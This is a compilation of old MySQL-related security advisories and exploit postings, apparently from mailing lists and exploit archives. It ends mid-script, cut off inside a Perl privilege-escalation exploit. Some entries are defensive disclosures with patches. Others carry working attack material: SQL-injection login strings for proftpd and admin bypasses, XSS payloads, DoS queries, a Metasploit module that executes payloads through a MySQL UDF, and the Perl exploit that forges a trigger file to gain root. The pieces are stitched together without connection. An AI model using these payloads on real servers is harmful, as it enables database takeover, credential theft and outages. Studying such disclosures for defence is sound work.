mysql

Hi.

While installing MySQL 3.22.29 and testing it out, I discovered a
very serious bug in it's handling of the GRANT statement.

I have decided to post this message at this time although a fixed
distribution is not yet available at mysql.com. The reason for this is
that the subject has been discussed on the MySQL mailing list, and
that the cat is therefore already out of the bag. Many crackers out
there are already aware of implications and how to exploit this bug. A
temporary solution is suggested in this post, and a patch from TCX is
attached at the bottom.



Affected:

Known: MySQL 3.22.27, 3.22.29, 3.23.8
Suspected: All MySQL versions since 3.22.11.


Impact:

Anyone with access to a running MySQL and GRANT privilege for any
database or table in it, can change any MySQL-password he wishes,
including the MySQL superuser's.


Implications:

If the malicious user has access to run processes on the machine where
MySQL is running, he can hijack the entire database. If he does not
have such access, he can DOS the server by setting the MySQL
superuser's password to a random string.

The 'test'-users installed by MySQL's install scripts have GRANT
privileges for any database whose name begins with 'test', and can
therefore be used to exploit this bug. The 'test' accounts by default
have no passwords set, and no restrictions on where connects can come
from.

This makes all default-configured MySQL very vulnerable (anyone on the
net can change your MySQL superuser password). Be aware, however, that
_any_ user with a GRANT privilege (no matter on which database) in
your MySQL installation can exploit this bug. You may be vulnerable
even if you've removed the 'test' users.


Story:

I contacted the MySQL mailing list and reported this bug (the MySQL
mailing list is the official place to report bugs). The first person
from mysql.com I had a discussion with, said that this was the way it
was supposed to work. GRANT privileges were, according to him, by
definition global (even GRANTs for a single database were apparently
global) and implied the possibility to change anyone's password. I
almost bought his story and started thinking about changing to another
RDBMS.

Fortunately, Monty at TCX Datakonsult AB (the company that originally
wrote MySQL) acknowledged that it was a real and serious bug. No one
without UPDATE privilige on the mysql.user table should be able to set
anyone's password. A fix has been made, and new releases will be
available for download very soon.


Recommendation:

It is STRONGLY RECOMMENDED that anyone running MySQL 3.22.11 or later
UPGRADE to the new versions as soon as they are available at
www.mysql.com and it's mirrors.

While waiting for the new versions to arrive, or for opportunity to
install them

1) Revoke _all_ GRANT privileges from _all_ users in your MySQL system
   except root@localhost. This includes GRANTs in the mysql.db table.

2) Confirm that your root@localhost password has not been altered.

For those of you using source distributions, I have received a patch
for the problem from TCX. It is attached at the bottom of this
message.



Details:

The bug is that the GRANT statement does not properly check privileges
when you give it an IDENTIFIED BY-clause. You can therefore GRANT
someone (including the MySQL superuser) a privilege you yourself
possess, and set her/his password at the same time using IDENTIFIED BY.

Which privilege you pass on does not matter. It is the side-effect
of the IDENTIFIED BY that does the magic. This can be exploited
regardless of your other permissions. You only need the GRANT
privilege for _any_ table or database to exploit this bug.

For someone having login access to the machine running MySQL,
hijacking the database is trivial once the MySQL superuser password
has been changed using the above method. For someone without login
access, changing the superuser password can be a simple way of
DOS:ing, or of extortion.

In the default setup, MySQL prohibits access to the superuser account
from any other hosts than localhost. Sites that allow superusers to
connect from the net may be vulnerable to hijacking from malicious
users without local access.

Since the password-less 'test'-accounts created by MySQL installation
scripts have GRANT privileges for any database whose name begins with
'test', they can be used to exploit this bug. Very nasty.


Exploit:

I will post an exploit as soon as the patched versions are available
(which should be tomorrow). The Kiddiez should be forced to do at
least _some_ work themselves. :-)


/Viktor...



----------------------------------------------------------------------


*** /my/monty/master/mysql-3.23.8-alpha/sql/sql_parse.cc        Fri Dec 31 13:53:03 1999
--- ./sql_parse.cc      Mon Jan 10 21:53:59 2000
***************
*** 1222,1227 ****
--- 1222,1246 ----
                      tables ? &tables->grant.privilege : 0,
                      tables ? 0 : 1))
         goto error;
+
+      /* Check that the user isn't trying to change a password for
    another
+       user if he doesn't have UPDATE privilege to the MySQL database
    */
+
+      List_iterator <LEX_USER> user_list(lex->users_list);
+      LEX_USER *user;
+      while ((user=user_list++))
+      {
+        if (user->password.str &amp;&amp;
+          (strcmp(thd->user,user->user.str) ||
+           user->host.str &amp;&amp; my_strcasecmp(user->host.str,
+                                           thd->host ? thd->host :
thd->ip)))
+        {
+        if (check_access(thd, UPDATE_ACL, "mysql",0,1))
+          goto error;
+        break;                                 // We are allowed to
do changes
+        }
+      }
+
       if (tables)
       {
         if (grant_option &amp;&amp; check_grant(thd,


----------------------------------------------------------------------







--|     Viktor Fougstedt, system administrator at dtek.chalmers.se     |--
--|                http://www.dtek.chalmers.se/~viktor/                |--
--| ...soon we'll be sliding down the razor blade of life. /Tom Lehrer |--

Hi,

Below you find a security advisory i wrote concerning a vulnerability found in
all (known to me) mysql server versions, including the latest one.
As mysql is a widely used sql platform, i strongly advise everyone using it
to read it, and fix where appropriate.
This email has been bcc'd to the mysql bug list, and other appropriate parties.

Greets,
  Robert van der Meulen/Emphyrio


.Introduction.

There exists a vulnerability in the password checking routines in the latest
versions of the MySQL server, that allows any user on a host that is allowed
to connect to the server, to skip password authentication, and access databases.
For the exploit to work, a valid username for the mysql server is needed, and
this username must have access to the database server, when connecting from
the attacking host.


.Vulnerable Systems.

All systems running 3.22.26a and up (tested).
Probably all systems running lower versions as well (not tested, not reviewed).
All versions are vulnerable on all platforms.


.A snippet of code from the mysql code, explaining password authentication **

>From mysql-3.22.26a/sql/password.c:
/* password checking routines */
/*****************************************************************************
  The main idea is that no password are sent between client & server on
  connection and that no password are saved in mysql in a decodable form.

  On connection a random string is generated and sent to the client.
  The client generates a new string with a random generator inited with
  the hash values from the password and the sent string.
  This 'check' string is sent to the server where it is compared with
  a string generated from the stored hash_value of the password and the
  random string.

<cut>
*****************************************************************************/


.More code, and vulnerability explanation.

The problem is, that in the comparison between the 'check' string, and the
string generated from the hash_value of the password and the random string,
the following code is used (from mysql-3.22.26a/sql/password.c):

  while (*scrambled)
  {
    if (*scrambled++ != (char) (*to++ ^ extra))
      return 1;                                 /* Wrong password */
  }

'scrambled' represents the 'check' value, and (*to++ ^ extra) walks trough the
hash_value.
Suppose a client would send a _single_ character to the server as the 'check'
string.
Of course the server should notice the check string is not the same length as
the check string needed, and give a password error.
Because no such checks are done, when a check string of length 1 is passed to
the server, only one character is compared.
So the only thing that remains to know if we want to peek in someone's MySQL
database, is a technique to find out the first character of the server-side
check string.

The string that's used for the comparison is generated using some random data,
so two following authenticate-actions will probably use different check-strings.
After looking at the algorithm, generating the check string, it becomes clear
that there are actually only 32 possibilities for each character.

In practice, this means that if you connect, sending one single character as
the check string, you will be in in about 32 tries maximum.


.Impact.

Hosts in the access list (by default any host, on a lot of distributions and
servers) can connect to the MySQL server, without a password, and access
(often sensitive) data _as long as the attacker has a valid username for the
database server_.
This vulnerability also incorporates a MySQL DoS attack, as the attacker can
shutdown database servers and delete data, if she logs in with the MySQL
management account.


.Exploit information.

I have an exploit available, but to defer script kiddies i will not release
it (yet).  Do not ask me for it.
If above explanation is understood, an exploit should be easy enough...


.Fix information.

Change the routine 'check_scramble' in mysql-3.22.26a/sql/password.c to do a
length check, _before_ starting the compare.
This should be as easy as inserting the following just above the
while (*scrambled) loop:

if (strlen(scrambled)!=strlen(to)) {
  return 1;
}

WARNING: This is NOT an official fix. You can use this as a temporary solution
to the problem.
Please check the official mysql site (www.mysql.org) for a fix.


.Commentary.

I think this exploit should not be a very scary thing to people that know
how to secure their servers.
In practice, there's almost never a need to allow the whole world to connect
to your SQL server, so that part of the deal should be taken care of.
As long as your MySQL ACL is secure, this problem doesn't really occur (unless
your database server doubles as a shell server).

We have also located several other security bugs in mysql server/client. These
bugs can only be exploited by users who have a valid username and password.
We will send these to the mysql maintainers, and hope they'll come
with a fix soon.

Yours,
        Robert van der Meulen/Emphyrio (rvdm@cistron.nl)
        Willem Pinckaers (dvorak@synnergy.net)


--

|      rvdm@cistron.nl - Cistron Internet Services - www.cistron.nl        |
|          php3/c/perl/html/c++/sed/awk/linux/sql/cgi/security             |
|         My statements are mine, and not necessarily cistron's.           |

##########################################################
# GulfTech Security Research              July 31st, 2005
##########################################################
# Vendor  : MySQL AB
# URL     : http://dev.mysql.com/downloads/other/eventum/
# Version : MySQL AB Eventum <= 1.5.5
# Risk    : Multiple Vulnerabilities
##########################################################



Description:
Eventum is a user-friendly and flexible issue tracking system that can
be used by a support department to track incoming technical support
requests, or by a software development team to quickly organize tasks
and bugs. Eventum is used by the MySQL AB Technical Support team.
Unfortunately Eventum is vulnerable to some highly exploitable SQL
Injection issues as well as cross site scripting issues. A new version
of Eventum has been released and users are strongly advised to upgrade
their Eventum installations.


Cross Site Scripting:
There are a number of cross site scripting issues in MySQL Eventum. You
can find several examples of these issues below.

http://eventum/view.php?id=1'%22%3E%3Ciframe%3E
http://eventum/list.php?keywords=&amp;users=&amp;category=&amp;release=%22%3E%3Ciframe%3E
http://eventum/get_jsrs_data.php?F=wee%22%3E%3Ciframe%3E

A malicious user can exploit these vulnerabilities to steal sensitive user
based information, or render hostile script in the context of the victim's
web browser.



SQL Injection:
MySQL Eventum is a very well written program, and does a good job to 
protect
against harmful input. However, there are a few some what blind SQL 
Injection
issues in Eventum, and these issues are very exploitable. First, let's have
a look at /includes/class.auth.php


    /**
     * Checks whether the provided password match against the email
     * address provided.
     *
     * @access  public
     * @param   string $email The email address to check for
     * @param   string $password The password of the user to check for
     * @return  boolean
     */
    function isCorrectPassword($email, $password)
    {
        $stmt = "SELECT usr_password FROM " . APP_DEFAULT_DB . "." . 
APP_TABLE_PREFIX . "
    user WHERE usr_email='$email'";
        $passwd = $GLOBALS["db_api"]->dbh->getOne($stmt);
        if (PEAR::isError($passwd)) {
            Error_Handler::logError(array($passwd->getMessage(), 
$passwd->getDebugInfo()),
        __FILE__, __LINE__);
            return false;
        } else {
            if ($passwd != md5($password)) {
                return false;
            } else {
                return true;
            }
        }
    }


MySQL Eventum usually sanitizes within functions, so as expected the $email
variable is never sanitized before being passed to this vulnerable 
function. Also,
if the target host is using a database that supports UNION functionality 
then we
can overwrite the expected returned password, and bypass the password 
check! The
above issue is very dangerous, but there is a nearly identical function used
alongside the isCorrectPassword function named userExists() and it is 
vulnerable
in an almost identical manner. In addition to the "pre-auth" SQL 
Injection vulns
are a few other SQL Injection vulnerabilities.

/reports/custom_fields.php->/includes/class.report.php->getCustomFieldReport()
/reports/custom_fields_graph.php->/includes/class.report.php->getCustomFieldReport()
/manage/releases.php->/includes/class.release.php->insert()

The above is a rough outline of the other vulnerable functions that have 
been
patched in the recent 1.6.0 release. Users should upgrade immediately.



Solution:
A new version of MySQL Eventum has been released. The official release 
notes can
be found at the link below.

http://lists.mysql.com/eventum-users/2072

Special thanks to Joao Prado Maia from the MySQL Devel team for a very quick
resolution of these issues.



Related Info:
The original advisory can be found at the following location
http://www.gulftech.org/?node=research&amp;article_id=00093-07312005



Credits:
James Bercegay of the GulfTech Security Research Team

 ---------------------------------------------------
- Robert Zimmerman PHP / MYSQL SCRIPTS ADMIN BYPASS -
 ---------------------------------------------------

 EXAMPLE SITES :  
- illoz.com
- illogator.com
- Drawger.com
- and more ...

EXPLOIT :

 Login :  '-'
 Pass  :  '-'

And u Got admin acces ;)


*/ hakerzy ze szkocji ;)  
   ------------------------------
  ---- DUNDEE ----- POLISH   ----- 
   ------------------------------
  MoJaCiPkA4  /*

 ---------------------------------------------------
- Robert Zimmerman PHP / MYSQL SCRIPTS ADMIN BYPASS -
 ---------------------------------------------------

EXPLOIT :

 Login :  '-'
 Pass  :  '-'

And u Got admin acces ;)


*/ hakerzy ze szkocji ;)	
   ------------------------------
  ---- DUNDEE ----- POLISH   ----- 
   ------------------------------
	MoJaCiPkA4	/*

1941,1956c1941,1942
<   if (passwd[0])
<   {
<     if (mysql->server_capabilities &amp; CLIENT_SECURE_CONNECTION)
<     {
<       *end++= SCRAMBLE_LENGTH;
<       scramble(end, mysql->scramble, passwd);
<       end+= SCRAMBLE_LENGTH;
<     }
<     else
<     {
<       scramble_323(end, mysql->scramble, passwd);
<       end+= SCRAMBLE_LENGTH_323 + 1;
<     }
<   }
<   else
<     *end++= '\0';                               /* empty password */
---
>   sprintf(end,"\x14\x00");
>   end+=2;

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$$  Flex MySQL Connector Remote SQL Execution Exploit           $$$
$$$                        $$$
$$$        || License:  Commercial          $$$
$$$        || Language:  English            $$$
$$$  Flex MySQL Connector  || Cost:  $45.00            $$$
$$$        || Platform:  Flash Player 9 | Flash Player 10    $$$
$$$        || Demo:  http://flexappsstore.com/flexapps/demo/mysql/  $$$
$$$                        $$$
$$$        || Name:   ~Fyodor (aka DungPQ)        $$$
$$$  Credit      || Email:  quangdung181188[at]gmail.com      $$$
$$$        || Location:  Hanoi, Vietnam          $$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

[$] Vulnz Description :
Flex MySQL Connector is a Flex Component from FlexAppsStore, which allow run SQL from ActionScript via PHP backend (Flash <=> PHP <=> MySQL). But anybody can modify the SQL command in Request packet and send to PHP backend, it means anybody can query SQL commands to victim's MySQL server => OMG !

[$] Exploitz :
Send Example SQL command to MySQL at http://flexappsstore.com/flexapps/demo/mysql/
-----------------------------------------------------------------------------------
> Dest.IP = 66.147.242.177
> Dest.PORT = 80
---[Request BOF]---
POST /flexapps/flexmysqlconn.php?irand=0.2112374654971063 HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; U; en) Presto/2.2.15 Version/10.10
Host: www.flexappsstore.com
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Referer: http://flexappsstore.com/flexapps/demo/mysql/index.swf
Connection: Keep-Alive, TE
TE: deflate, gzip, chunked, identity, trailers
Content-Length: 89
Content-type: application/x-www-form-urlencoded

fas%5Fdb=flexapps%5Fdemxo&amp;fas%5Fsql=SELECT%20count%28%2A%29%20as%20cnt1%20FROM%20tbl%5Fbigbig
---[Request EOF]---

(Oh yeah, SQL command is SELECT%20count%28%2A%29%20as%20cnt1%20FROM%20tbl%5Fbigbig => SELECT count(*) as cnt1 FROM tbl_bigbig)

[$] PS: I don't give full PoC sourcecode. You can make your PoC by PHP (using fsockopen(), cUrl, ...) but if you want, contact me. ^_^
[$] ~Fyodor - The Still Lake

#########################################################
MysqlDumper Version 1.21 b6 Xss  Vulnerability

#########################################################

By Crackers_Child

crackers_child@sibersavascilar.com

www.sibersavacilar.com

#########################################################

Download Script

http://www.mysqldumper.de/board/downloads.php?view=detail&id=17


#########################################################
Exploit
#########################################################


www.site.com/mysqldumper_path/sql.php?db=[Xss codes]

#########################################################

Examples

/mysqldumper_path/sql.php?db=<script>alert(document.cookie)</script>

/mysqldumper_path/sql.php?db=<script>alert(/HACKED BY CRACKERS_CHİLD)</script>

#########################################################

Greetz:All My Friends !

#########################################################

MySQL is prone to a denial-of-service vulnerability.

An attacker can exploit this issue to crash the database, denying access to legitimate users.

This issue affects versions prior to MySQL 5.1.49.

NOTE: This issue was previously covered in BID 42586 (Oracle MySQL Prior to 5.1.49 Multiple Denial Of Service Vulnerabilities) but has been assigned its own record to better document it.

PoC:

drop table if exists `t1`;
create table `t1`(`a` int)engine=myisam;
insert into `t1` values (1);
/*crash1*/select (`a` in (`a`,`a`)) from `t1` group by `a` with rollup;
/*crash2*/select (case (`a`) when (`a`) then (`a`) end) as `a` from `t1` group by `a`
with rollup;

MySQL UDF for command execution

[1] http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html
[2] https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/mysqludfsys/lib_mysqludf_sys_0.0.3.tar.gz

mirror: http://exploit-db.com/sploits/2009-lib_mysqludf_sys_0.0.3.tar.gz

# milw0rm.com [2009-01-25]

##
# $Id: mysql_payload.rb 11899 2011-03-08 22:42:26Z todb $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::MYSQL
	include Msf::Exploit::CmdStagerVBS

	def initialize(info = {})
		super(
			update_info(
				info,
			'Name'           => 'Oracle MySQL for Microsoft Windows Payload Execution',
			'Description'    => %q{
				This module creates and enables a custom UDF (user defined function) on the
				target host via the SELECT ... into DUMPFILE method of binary injection. On
				default Microsoft Windows installations of MySQL (=< 5.5.9), directory write
				permissions not enforced, and the MySQL service runs as LocalSystem.

				NOTE: This module will leave a payload executable on the target system when the
				attack is finished, as well as the UDF DLL, and will define or redefine sys_eval()
				and sys_exec() functions.
			},
		'Author'         =>
		[
			'Bernardo Damele A. G. <bernardo.damele[at]gmail.com>', # the lib_mysqludf_sys.dll binaries
			'todb' # this Metasploit module
		],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 11899 $',
			'References'     =>
		[
			# Bernardo's work with cmd exec via udf
			[ 'URL', 'http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html' ],
			# Advice from 2005 on securing MySQL on Windows, kind of helpful.
			[ 'URL', 'http://dev.mysql.com/tech-resources/articles/securing_mysql_windows.html' ]
		],
			'Platform'       => 'win',
			'Targets'        =>
		[
			[ 'Automatic', { } ], # Confirmed on MySQL 4.1.22, 5.5.9, and 5.1.56 (64bit)
		],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Jan 16 2009' # Date of Bernardo's blog post.
		))
		register_options(
			[
				OptBool.new('VERBOSE', [ false, 'Enable verbose output', false ]),
				OptBool.new('FORCE_UDF_UPLOAD', [ false, 'Always attempt to install a sys_exec() mysql.function.', false ]),
				OptString.new('USERNAME', [ false, 'The username to authenticate as', 'root' ])
		])
	end

	def username
		datastore['USERNAME']
	end

	def password
		datastore['PASSWORD']
	end

	def login_and_get_sys_exec
		mysql_login(username,password,'mysql')
		@mysql_arch = mysql_get_arch
		@mysql_sys_exec_available = mysql_check_for_sys_exec() 
		if !@mysql_sys_exec_available || datastore['FORCE_UDF_UPLOAD']
			mysql_add_sys_exec 
			@mysql_sys_exec_available = mysql_check_for_sys_exec() 
		else
			print_status "sys_exec() already available, using that (override with FORCE_UDF_UPLOAD)."
		end
	end

	def execute_command(cmd, opts)
		mysql_sys_exec(cmd, datastore['VERBOSE'])
	end

	def exploit
		login_and_get_sys_exec()

		if not @mysql_handle
			print_status("Invalid MySQL credentials")
			return
		elsif not [:win32,:win64].include?(@mysql_arch) 
			print_status("Incompatible MySQL target architecture: '#{@mysql_arch}'")
			return
		else
			if @mysql_sys_exec_available
				execute_cmdstager({:linemax => 1500, :nodelete => true})
				handler
			else
				print_status("MySQL function sys_exec() not available")
				return
			end
		end
		disconnect
	end

end

Just found out a problem with proftpd's sql authentication. The problem is easily reproducible if you login with username like:

USER %') and 1=2 union select 1,1,uid,gid,homedir,shell from users; -- 

and a password of "1" (without quotes).

which leads to a successful login. Different account logins can be made successful using the limit clase (e.g appending "LIMIT 5,1" will make you login with as the 5th account in the users table).

As far as I can see in the mysql logs the query becomes:

SELECT userid, passwd, uid, gid, homedir, shell FROM users WHERE (userid='{UNKNOWN TAG}') and 1=2 union select 1,1,uid,gid,homedir,shell from users limit 1,1; -- ') LIMIT 1

I think the problem lies in the handling of the "%" character (probably that's some way to sanitize input to avoid format string things?).

Anyway, %' effectively makes the single quote unescaped and that eventually allows for an SQL injection during login.

# milw0rm.com [2009-02-10]

A vulnerability was reported in MySQL. A remote authenticated user can cause denial of service conditions.

This issue affects versions prior to MySQL 5.1.48. 

A remote authenticated user can send a specially crafted ALTER DATABASE command to cause the target server to move a data directory into a new subdirectory, causing the data directory to become unusable.

A demonstration exploit request is provided [where "<special>" is "." or ".." or is a sequence that begins with "./" or "../"]:

ALTER DATABASE `#mysql50#<special>` UPGRADE DATA DIRECTORY NAME

Vendor advisory at:

http://dev.mysql.com/doc/refman/5.1/en/news-5-1-48.html

use DBI();

$|=1;

=for comment

MySQL privilege elevation Exploit
This exploit adds a new admin user.
By Kingcope

Tested on 
* Debian Lenny (mysql-5.0.51a)
* OpenSuSE 11.4 (5.1.53-log)

How it works:
This exploit makes use of several things:
*The attacker is in possession of a mysql user with 'file' privileges for the target
*So the attacker can create files on the system with this user (owned by user 'mysql')
*So the attacker is able to create TRIGGER files for a mysql table
	triggers can be used to trigger an event when a mysql command is executed by the user,
	normally triggers are 'attached' to a user and will be executed with this users privilege.
	because we can write any contents into the TRG file (the actual trigger file), we write the entry
	describing the attached user for the trigger as "root@localhost" what is the default admin user.
* We make use of the stack overrun priorly discovered to flush the server config so the trigger file is recognized.
  This step is really important, without crashing the mysql server instance and reconnecting (the server will respawn)
  the trigger file would not be recognized.

So what the exploit does is:
* Connect to the MySQL Server
* Create a table named rootme for the trigger
* Create the trigger file in /var/lib/mysql/<databasename>/rootme.TRG
* Crash the MySQL Server to force it to respawn and recognize the trigger file (by triggering the stack overrun)
* INSERT a value into the table so the trigger event gets executed
* The trigger now sets all privileges of the current connecting user in the mysql.user table to enabled.
* Crash the MySQL Server again to force it reload the user configuration
* Create a new mysql user with all privileges set to enabled
* Crash again to reload configuration
* Connect by using the newly created user
* The new connection has ADMIN access now to all databases in mysql
* The user and password hashes in the mysql.user table are dumped for a convinient way to show the exploit succeeded
* As said the user has FULL ACCESS to the database now

Respawning of mysqld is done by mysqld_safe so this is not an issue in any configuration I've seen.
=cut

=for comment

user created for testing (file privs will minor privileges to only one database):

mysql> CREATE USER 'less'@'%' IDENTIFIED BY 'test';
Query OK, 0 rows affected (0.00 sec)

mysql> create database lessdb
    -> ;
Query OK, 1 row affected (0.00 sec)

mysql> GRANT ALL PRIVILEGES ON lessdb.* TO 'less'@'%' WITH GRANT OPTION;
Query OK, 0 rows affected (0.02 sec)

mysql> GRANT FILE ON *.* TO 'less'@'%' WITH GRANT OPTION;
Query OK, 0 rows affected (0.00 sec)

login with new unprivileged user:
mysql> select * from mysql.user;
ERROR 1142 (42000): SELECT command denied to user 'less2'@'localhost' for table 'user'

=cut

=for comment

example attack output:

C:\Users\kingcope\Desktop>perl mysql_privilege_elevation.pl
select 'TYPE=TRIGGERS' into outfile'/var/lib/mysql/lessdb3/rootme.TRG' LINES TER
MINATED BY '\ntriggers=\'CREATE DEFINER=`root`@`localhost` trigger atk after ins
ert on rootme for each row\\nbegin \\nUPDATE mysql.user SET Select_priv=\\\'Y\\\
', Insert_priv=\\\'Y\\\', Update_priv=\\\'Y\\\', Delete_priv=\\\'Y\\\', Create_p
riv=\\\'Y\\\', Drop_priv=\\\'Y\\\', Reload_priv=\\\'Y\\\', Shutdown_priv=\\\'Y\\
\', Process_priv=\\\'Y\\\', File_priv=\\\'Y\\\', Grant_priv=\\\'Y\\\', Reference
s_priv=\\\'Y\\\', Index_priv=\\\'Y\\\', Alter_priv=\\\'Y\\\', Show_db_priv=\\\'Y
\\\', Super_priv=\\\'Y\\\', Create_tmp_table_priv=\\\'Y\\\', Lock_tables_priv=\\
\'Y\\\', Execute_priv=\\\'Y\\\', Repl_slave_priv=\\\'Y\\\', Repl_client_priv=\\\
'Y\\\', Create_view_priv=\\\'Y\\\', Show_view_priv=\\\'Y\\\', Create_routine_pri
v=\\\'Y\\\', Alter_routine_priv=\\\'Y\\\', Create_user_priv=\\\'Y\\\', ssl_type=
\\\'Y\\\', ssl_cipher=\\\'Y\\\', x509_issuer=\\\'Y\\\', x509_subject=\\\'Y\\\',
max_questions=\\\'Y\\\', max_updates=\\\'Y\\\', max_connections=\\\'Y\\\' WHERE
User=\\\'less3\\\';\\nend\'\nsql_modes=0\ndefiners=\'root@localhost\'\nclient_cs
_names=\'latin1\'\nconnection_cl_names=\'latin1_swedish_ci\'\ndb_cl_names=\'lati
n1_swedish_ci\'\n';DBD::mysql::db do failed: Unknown table 'rootme' at mysql_pri
vilege_elevation.pl line 44.
DBD::mysql::db do failed: Lost connection to MySQL server during query at mysql_
privilege_elevation.pl line 50.
DBD::mysql::db do failed: Lost connection to MySQL server during query at mysql_
privilege_elevation.pl line 59.
W00TW00T!
Found a row: id = root, name = *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
Found a row: id = root, name = *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
Found a row: id = root, name = *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
Found a row: id = debian-sys-maint, name = *C5524C128621D8A050B6DD616B06862F9D64
B02C
Found a row: id = some1, name = *94BDCEBE19083CE2A1F959FD02F964C7AF4CFC29
Found a row: id = monty, name = *BF06A06D69EC935E85659FCDED1F6A80426ABD3B
Found a row: id = less, name = *94BDCEBE19083CE2A1F959FD02F964C7AF4CFC29
Found a row: id = r00ted, name = *EAD0219784E951FEE4B82C2670C9A06D35FD5697
Found a row: id = user, name = *14E65567ABDB5135D0CFD9A70B3032C179A49EE7
Found a row: id = less2, name = *94BDCEBE19083CE2A1F959FD02F964C7AF4CFC29
Found a row: id = less3, name = *94BDCEBE19083CE2A1F959FD02F964C7AF4CFC29
Found a row: id = rootedsql, name = *4149A2E66A41BD7C8F99D7F5DF6F3522B9D7D9BC

=cut

$user = "less10";
$password = "test";
$database = "lessdb10";
$target = "192.168.2.4";
$folder = "/var/lib/mysql/"; # Linux
$newuser = "rootedbox2";
$newuserpass = "rootedbox2";
$mysql_version = "51"; # can be 51 or 50

if ($mysql_version eq "50") {
$inject =
"select 'TYPE=TRIGGERS' into outfile'".$folder.$database."/rootme.TRG' LINES TERMINATED BY '\\ntriggers=\\'CREATE DEFINER=`root`\@`localhost` trigger atk after insert on rootme for each row\\\\nbegin \\\\nUPDATE mysql.user SET Select_priv=\\\\\\'Y\\\\\\', Insert_priv=\\\\\\'Y\\\\\\', Update_priv=\\\\\\'Y\\\\\\', Delete_priv=\\\\\\'Y\\\\\\', Create_priv=\\\\\\'Y\\\\\\', Drop_priv=\\\\\\'Y\\\\\\', Reload_priv=\\\\\\'Y\\\\\\', Shutdown_priv=\\\\\\'Y\\\\\\', Process_priv=\\\\\\'Y\\\\\\', File_priv=\\\\\\'Y\\\\\\', Grant_priv=\\\\\\'Y\\\\\\', References_priv=\\\\\\'Y\\\\\\', Index_priv=\\\\\\'Y\\\\\\', Alter_priv=\\\\\\'Y\\\\\\', Show_db_priv=\\\\\\'Y\\\\\\', Super_priv=\\\\\\'Y\\\\\\', Create_tmp_table_priv=\\\\\\'Y\\\\\\', Lock_tables_priv=\\\\\\'Y\\\\\\', Execute_priv=\\\\\\'Y\\\\\\', Repl_slave_priv=\\\\\\'Y\\\\\\', Repl_client_priv=\\\\\\'Y\\\\\\', Create_view_priv=\\\\\\'Y\\\\\\', Show_view_priv=\\\\\\'Y\\\\\\', Create_routine_priv=\\\\\\'Y\\\\\\', Alter_routine_priv=\\\\\\'Y\\\\\\', Create_user_priv=\\\\\\'Y\\\\\\', ssl_type=\\\\\\'Y\\\\\\', ssl_cipher=\\\\\\'Y\\\\\\', x509_issuer=\\\\\\'Y\\\\\\', x509_subject=\\\\\\'Y\\\\\\', max_questions=\\\\\\'Y\\\\\\', max_updates=\\\\\\'Y\\\\\\', max_connections=\\\\\\'Y\\\\\\' WHERE User=\\\\\\'$user\\\\\\';\\\\nend\\'\\nsql_modes=0\\ndefiners=\\'root\@localhost\\'\\nclient_cs_names=\\'latin1\\'\\nconnection_cl_names=\\'latin1_swedish_ci\\'\\ndb_cl_names=\\'latin1_swedish_ci\\'\\n';";
} else {
$inject =
"select 'TYPE=TRIGGERS' into outfile'".$folder.$database."/rootme.TRG' LINES TERMINATED BY '\\ntriggers=\\'CREATE DEFINER=`root`\@`localhost` trigger atk after insert on rootme for each row\\\\nbegin \\\\nUPDATE mysql.user SET Select_priv=\\\\\\'Y\\\\\\', Insert_priv=\\\\\\'Y\\\\\\', Update_priv=\\\\\\'Y\\\\\\', Delete_priv=\\\\\\'Y\\\\\\', Create_priv=\\\\\\'Y\\\\\\', Drop_priv=\\\\\\'Y\\\\\\', Reload_priv=\\\\\\'Y\\\\\\', Shutdown_priv=\\\\\\'Y\\\\\\', Process_priv=\\\\\\'Y\\\\\\', File_priv=\\\\\\'Y\\\\\\', Grant_priv=\\\\\\'Y\\\\\\', References_priv=\\\\\\'Y\\\\\\', Index_priv=\\\\\\'Y\\\\\\', Alter_priv=\\\\\\'Y\\\\\\', Show_db_priv=\\\\\\'Y\\\\\\', Super_priv=\\\\\\'Y\\\\\\', Create_tmp_table_priv=\\\\\\'Y\\\\\\', Lock_tables_priv=\\\\\\'Y\\\\\\', Execute_priv=\\\\\\'Y\\\\\\', Repl_slave_priv=\\\\\\'Y\\\\\\', Repl_client_priv=\\\\\\'Y\\\\\\', Create_view_priv=\\\\\\'Y\\\\\\', Show_view_priv=\\\\\\'Y\\\\\\', Create_routine_priv=\\\\\\'Y\\\\\\', Alter_routine_priv=\\\\\\'Y\\\\\\', Create_user_priv=\\\\\\'Y\\\\\\', Event_priv=\\\\\\'Y\\\\\\', Trigger_priv=\\\\\\'Y\\\\\\', ssl_type=\\\\\\'Y\\\\\\', ssl_cipher=\\\\\\'Y\\\\\\', x509_issuer=\\\\\\'Y\\\\\\', x509_subject=\\\\\\'Y\\\\\\', max_questions=\\\\\\'Y\\\\\\', max_updates=\\\\\\'Y\\\\\\', max_connections=\\\\\\'Y\\\\\\' WHERE User=\\\\\\'$user\\\\\\';\\\\nend\\'\\nsql_modes=0\\ndefiners=\\'root\@localhost\\'\\nclient_cs_names=\\'latin1\\'\\nconnection_cl_names=\\'latin1_swedish_ci\\'\\ndb_cl_names=\\'latin1_swedish_ci\\'\\n';";
}

print $inject;#exit;
$inject2 =
